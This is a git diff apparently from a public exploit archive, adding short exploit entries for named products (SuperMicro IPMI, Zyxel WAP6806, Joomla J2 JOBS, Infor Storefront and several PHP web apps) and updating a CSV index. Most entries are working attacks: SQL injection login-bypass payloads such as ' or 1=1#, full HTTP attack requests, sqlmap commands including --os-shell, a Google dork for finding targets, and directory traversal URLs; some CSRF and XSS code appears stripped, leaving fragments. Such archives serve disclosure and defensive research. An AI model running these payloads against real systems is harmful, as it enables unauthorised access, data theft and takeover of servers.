diff --git a/exploits/hardware/webapps/48668.txt b/exploits/hardware/webapps/48668.txt new file mode 100644 index 000000000..390b583f4 --- /dev/null +++ b/exploits/hardware/webapps/48668.txt @@ -0,0 +1,28 @@ +# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Metin Yunus Kandemir +# Date: 2020-07-15 +# Vendor Homepage: https://www.supermicro.com/ +# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 +# CVE: CVE-2020-15046 +# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery + +# Description: +# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 +# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users. +# The fixed versions are BIOS 3.2 and firmware 03.88. + +# PoC : + + + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48669.txt b/exploits/hardware/webapps/48669.txt new file mode 100644 index 000000000..ebe0201c5 --- /dev/null +++ b/exploits/hardware/webapps/48669.txt @@ -0,0 +1,21 @@ +# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal +# Date: 2020-06-19 +# Exploit Author: Rajivarnan R +# Vendor Homepage: https://www.zyxel.com/ +# Software [http://www.zyxelguard.com/WAP6806.asp] +# Version: [V1.00(ABAL.6)C0] +# CVE: 2020-14461 +# Tested on: Linux Mint / Windows 10 +# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD] + +# As a result of the research, one vulnerability identified. +# (Directory Traversal) +# Technical information is provided below step by step. + +# [1] - Directory Traversal Vulnerability + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/] + +# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/ + \ No newline at end of file diff --git a/exploits/php/webapps/48626.txt b/exploits/php/webapps/48626.txt index 694c4d00d..979721b78 100644 --- a/exploits/php/webapps/48626.txt +++ b/exploits/php/webapps/48626.txt @@ -6,6 +6,7 @@ # Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 +# CVE: CVE-2020-15599 Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting diff --git a/exploits/php/webapps/48670.txt b/exploits/php/webapps/48670.txt new file mode 100644 index 000000000..246a5b996 --- /dev/null +++ b/exploits/php/webapps/48670.txt @@ -0,0 +1,36 @@ +# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection +# Date: 2020-06-17 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Vendor Homepage: https://joomsky.com/ +# Software Link: https://joomsky.com/products/js-jobs-pro.html +# Change Log (Update) : https://joomsky.com/products/js-jobs.html +# Version: 1.3.0 +# Tested on: Kali Linux - Apache2 + +Vulnerable param: sortby +------------------------------------------------------------------------- +POST /joomla/administrator/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/joomla/administrator/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 233 +Connection: close +Cookie: COOKIES +Upgrade-Insecure-Requests: 1 + +js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1 + + +------------------------------------------------------------------------- +sqlmap poc: + +sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby + + +Mehmet KELEPÇE + +Penetration Tester | Red Team \ No newline at end of file diff --git a/exploits/php/webapps/48671.txt b/exploits/php/webapps/48671.txt new file mode 100644 index 000000000..32d860fd8 --- /dev/null +++ b/exploits/php/webapps/48671.txt @@ -0,0 +1,46 @@ +# Exploit Title: Online Polling System 1.0 - Authentication Bypass +# Date: 2020-07-20 +# Author: AppleBois +# Version: NULL +# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html +# +# Administration Control Panel || Authentication Bypass +# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php +# +###################################################################################### +#Vulnerable Code +# +#$myusername=$_POST['myusername']; +#$mypassword=$_POST['mypassword']; +#$encrypted_mypassword=md5($mypassword); +# +#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'"); +# +#$count=mysqli_num_rows($result); +# +#if($count==1){ +# +#$user = mysqli_fetch_assoc($result); +#$_SESSION['member_id'] = $user['member_id']; +#header("location:student.php"); +#} +# +###################################################################################### + + +POST /admin/checklogin.php HTTP/1.1 +Host: 10.10.10.2:81 +Content-Length: 53 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.10.2:81 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.10.2:81/online/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5 +Connection: close + +myusername=' or 1=1#&mypassword=ad&Submit=Login \ No newline at end of file diff --git a/exploits/php/webapps/48672.txt b/exploits/php/webapps/48672.txt new file mode 100644 index 000000000..723748ac9 --- /dev/null +++ b/exploits/php/webapps/48672.txt @@ -0,0 +1,36 @@ +# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass +# Date: 2020-07-03 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system +# Software Link: https://github.com/mrzulkarnine/Web-based-hotel- +booking-system +# Version: 0.1.0 +# Tested on: Kali Linux + +Source code(localhost/admin/loginauth.php): + 0) + { + header('Refresh: 0;url=dashboard.php'); + } + else + { + + session_destroy(); + header("location: index.htm"); + } + ?> + +Payload: + Username: 1' or 1 = 1 LIMIT 1# + Password: 1' or 1 = 1 LIMIT 1# \ No newline at end of file diff --git a/exploits/php/webapps/48673.txt b/exploits/php/webapps/48673.txt new file mode 100644 index 000000000..d23958d20 --- /dev/null +++ b/exploits/php/webapps/48673.txt @@ -0,0 +1,26 @@ +# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting +# Date: 2020-06-29 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html +# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/ +# Version: 0.1.0 +# Tested on: Kali Linux + +Source code(review.php): +fetch_array()) : +?> +
+
+
+ +
+ + +POC: + +1. http://192.168.1.58/a/review.php?pid=31 go +2. We send the payload () +3. Write a review payload and submit +4. And refresh the page \ No newline at end of file diff --git a/exploits/php/webapps/48674.txt b/exploits/php/webapps/48674.txt new file mode 100644 index 000000000..db30eb97c --- /dev/null +++ b/exploits/php/webapps/48674.txt @@ -0,0 +1,37 @@ +# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection +# Google Dork: inurl:storefrontb2bweb +# Date: 2020-06-27 +# Exploit Author: ratboy +# Vendor Homepage: https://www.insitesoft.com/infor-storefront/ +# Version: Infor Storefront +# Tested on: Windows All Versions + +[POC Multiple Vulns] + +python sqlmap.py -u +"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" +-p usr_name --dbms=mssql --level=5 --risk=3 +--tamper=between,space2comment -o --random-agent --parse-errors +--os-shell --technique=ES + + +python sqlmap.py -u +"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" +-p itm_id --dbms=mssql --level=5 --risk=3 +--tamper=between,space2comment -o --random-agent --parse-errors +--os-shell --technique=ES + + +or... + +http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL +INJECTION];-- + +http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL +INJECTION];-- + + + +-- +Sincerly, +Aaron Schrom \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a33141678..3650ffcef 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42915,3 +42915,10 @@ id,file,description,date,author,type,platform,port 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php, 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple, 48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple, +48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware, +48669,exploits/hardware/webapps/48669.txt,"Zyxel Armor X1 WAP6806 - Directory Traversal",2020-07-15,"Rajivarnan R",webapps,hardware, +48670,exploits/php/webapps/48670.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-15,"Mehmet Kelepçe",webapps,php, +48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php, +48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php, +48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php, +48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,